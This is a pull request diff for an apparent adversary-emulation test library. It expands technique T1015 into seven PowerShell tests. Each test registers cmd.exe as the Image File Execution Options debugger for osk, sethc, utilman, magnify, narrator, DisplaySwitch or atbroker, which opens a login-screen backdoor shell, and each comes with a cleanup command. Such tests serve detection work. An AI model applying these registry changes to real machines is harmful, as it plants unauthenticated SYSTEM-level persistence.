### PR TITLE
Revert "T1015 collapsed technique into one atomic with additional inputargs"

### DIFF
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -20,14 +20,25 @@ Other accessibility features exist that may also be leveraged in a similar fashi
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes)
+- [Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk](#atomic-test-1---attaches-command-prompt-as-debugger-to-process---osk)
+
+- [Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc](#atomic-test-2---attaches-command-prompt-as-debugger-to-process---sethc)
+
+- [Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman](#atomic-test-3---attaches-command-prompt-as-debugger-to-process---utilman)
+
+- [Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify](#atomic-test-4---attaches-command-prompt-as-debugger-to-process---magnify)
+
+- [Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator](#atomic-test-5---attaches-command-prompt-as-debugger-to-process---narrator)
+
+- [Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch](#atomic-test-6---attaches-command-prompt-as-debugger-to-process---displayswitch)
+
+- [Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker](#atomic-test-7---attaches-command-prompt-as-debugger-to-process---atbroker)
 
 
 <br/>
 
-## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes
+## Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk
 This allows adversaries to execute the attached process
-Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".
 
 **Supported Platforms:** Windows
 
@@ -35,35 +46,268 @@ Attaches cmd.exe to osk.exe by default. Other useful values to include in parent
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| parent_list | Comma separated list of system binaries to which you want to attach each | String | osk.exe|
-| attached_process | Full path to process to attach to target in | Path | C:\windows\system32\cmd.exe|
+| target_executable | File You Want To Attach cmd To | String | osk.exe|
 
 
 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
 ```
-$input_table = #{parent_list}
-Foreach ($item in $input_table){   
-  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-  $Value = "#{attached_process}"
-  $Name = "Debugger"
-  IF(!(Test-Path $registryPath))
-  {
-    New-Item -Path $registryPath -Force
-    New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-  }
-  ELSE
-  {
-    New-ItemProperty -Path $registryPath -Name $name -Value $Value
-  }
-}
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
 ```
 
 #### Cleanup Commands:
 ```
-$input_table = #{parent_list}  
-Foreach ($item in $input_table){
-  reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
-}
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | sethc.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | utilman.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | magnify.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | narrator.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+  New-Item -Path $registryPath -Force | Out-Null
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ELSE
+ {
+  New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+```
+
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
 ```
 
 

--- a/atomics/T1015/T1015.yaml
+++ b/atomics/T1015/T1015.yaml
@@ -3,44 +3,222 @@ attack_technique: T1015
 display_name: Accessibility Features
 
 atomic_tests:
-- name: Attaches Command Prompt as a Debugger to a List of Target Processes
+- name: Attaches Command Prompt As Debugger To Process - osk
   description: |
     This allows adversaries to execute the attached process
-    Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".
 
   supported_platforms:
     - windows
   input_arguments:
-    parent_list:
-      description: Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
+    target_executable:
+      description: File You Want To Attach cmd To
       type: String
-      default: "osk.exe"
-    attached_process:
-      description: Full path to process to attach to target in #{parent_list}. Default: cmd.exe
-      type: Path
-      default: C:\windows\system32\cmd.exe
+      default: osk.exe
 
   executor:
     name: powershell
     elevation_required: true
     command: |
-      $input_table = #{parent_list}
-      Foreach ($item in $input_table){   
-        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-        $Value = "#{attached_process}"
-        $Name = "Debugger"
-        IF(!(Test-Path $registryPath))
-        {
-          New-Item -Path $registryPath -Force
-          New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-        }
-        ELSE
-        {
-          New-ItemProperty -Path $registryPath -Name $name -Value $Value
-        }
-      }
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
     cleanup_command: |
-      $input_table = #{parent_list}  
-      Foreach ($item in $input_table){
-        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
-      }
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+
+
+- name: Attaches Command Prompt As Debugger To Process - sethc
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: sethc.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+
+- name: Attaches Command Prompt As Debugger To Process - utilman
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: utilman.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
+
+- name: Attaches Command Prompt As Debugger To Process - magnify
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: magnify.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
+
+- name: Attaches Command Prompt As Debugger To Process - narrator
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: narrator.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
+
+
+- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: DisplaySwitch.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
+
+
+- name: Attaches Command Prompt As Debugger To Process - AtBroker
+  description: |
+    This allows adversaries to execute the attached process
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    target_executable:
+      description: File You Want To Attach cmd To
+      type: String
+      default: atbroker.exe
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+      $Value = "C:\windows\system32\cmd.exe"
+      $Name = "Debugger"
+      IF(!(Test-Path $registryPath))
+       {
+        New-Item -Path $registryPath -Force | Out-Null
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+       }
+      ELSE
+       {
+        New-ItemProperty -Path $registryPath -Name $name -Value $Value
+       }
+    cleanup_command: |
+      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f

--- a/atomics/index.md
+++ b/atomics/index.md
@@ -4,7 +4,13 @@
   - Atomic Test #1: Add command to .bash_profile [macos, linux]
   - Atomic Test #2: Add command to .bashrc [macos, linux]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1098 Account Manipulation](./T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -409,7 +415,13 @@
 - [T1134 Access Token Manipulation](./T1134/T1134.md)
   - Atomic Test #1: Access Token Manipulation [windows]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]

--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -166,35 +166,228 @@ persistence:
       modified: '2019-07-16T19:07:04.652Z'
       identifier: T1015
     atomic_tests:
-    - name: Attaches Command Prompt as a Debugger to a List of Target Processes
-      description: |
-        This allows adversaries to execute the attached process
-        Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".
+    - name: Attaches Command Prompt As Debugger To Process - osk
+      description: 'This allows adversaries to execute the attached process
+
+'
       supported_platforms:
       - windows
       input_arguments:
-        parent_list:
-          description: Comma separated list of system binaries to which you want to
-            attach each
+        target_executable:
+          description: File You Want To Attach cmd To
           type: String
           default: osk.exe
-        attached_process:
-          description: Full path to process to attach to target in
-          type: Path
-          default: C:\windows\system32\cmd.exe
       executor:
         name: powershell
         elevation_required: true
-        command: "$input_table = #{parent_list}\nForeach ($item in $input_table){
-          \  \n  $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
-          File Execution Options\\$item\"\n  $Value = \"#{attached_process}\"\n  $Name
-          = \"Debugger\"\n  IF(!(Test-Path $registryPath))\n  {\n    New-Item -Path
-          $registryPath -Force\n    New-ItemProperty -Path $registryPath -Name $name
-          -Value $Value -PropertyType STRING -Force\n  }\n  ELSE\n  {\n    New-ItemProperty
-          -Path $registryPath -Name $name -Value $Value\n  }\n}\n"
-        cleanup_command: "$input_table = #{parent_list}  \nForeach ($item in $input_table){\n
-          \ reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
-          File Execution Options\\$item\" /v Debugger /f\n}\n"
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - sethc
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: sethc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - utilman
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: utilman.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - magnify
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: magnify.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - narrator
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: narrator.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: DisplaySwitch.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - AtBroker
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: atbroker.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force | Out-Null
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+          /f
+
+'
   T1098:
     technique:
       x_mitre_permissions_required:
@@ -12614,35 +12807,228 @@ privilege-escalation:
       modified: '2019-07-16T19:07:04.652Z'
       identifier: T1015
     atomic_tests:
-    - name: Attaches Command Prompt as a Debugger to a List of Target Processes
-      description: |
-        This allows adversaries to execute the attached process
-        Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".
+    - name: Attaches Command Prompt As Debugger To Process - osk
+      description: 'This allows adversaries to execute the attached process
+
+'
       supported_platforms:
       - windows
       input_arguments:
-        parent_list:
-          description: Comma separated list of system binaries to which you want to
-            attach each
+        target_executable:
+          description: File You Want To Attach cmd To
           type: String
           default: osk.exe
-        attached_process:
-          description: Full path to process to attach to target in
-          type: Path
-          default: C:\windows\system32\cmd.exe
       executor:
         name: powershell
         elevation_required: true
-        command: "$input_table = #{parent_list}\nForeach ($item in $input_table){
-          \  \n  $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
-          File Execution Options\\$item\"\n  $Value = \"#{attached_process}\"\n  $Name
-          = \"Debugger\"\n  IF(!(Test-Path $registryPath))\n  {\n    New-Item -Path
-          $registryPath -Force\n    New-ItemProperty -Path $registryPath -Name $name
-          -Value $Value -PropertyType STRING -Force\n  }\n  ELSE\n  {\n    New-ItemProperty
